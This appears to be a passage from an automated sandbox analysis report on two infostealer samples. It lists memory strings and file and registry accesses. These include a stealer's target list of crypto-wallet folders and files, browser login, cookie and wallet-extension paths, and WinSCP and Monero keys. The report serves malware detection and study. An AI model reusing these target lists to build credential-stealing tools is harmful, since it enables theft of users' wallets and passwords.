Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: 21AE.exe, 00000005.00000003.2493723508.000000000088F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 21AE.exe, 00000005.00000003.2493723508.000000000088F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Opens network shares
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: \\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: \\config\ Jump to behavior
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
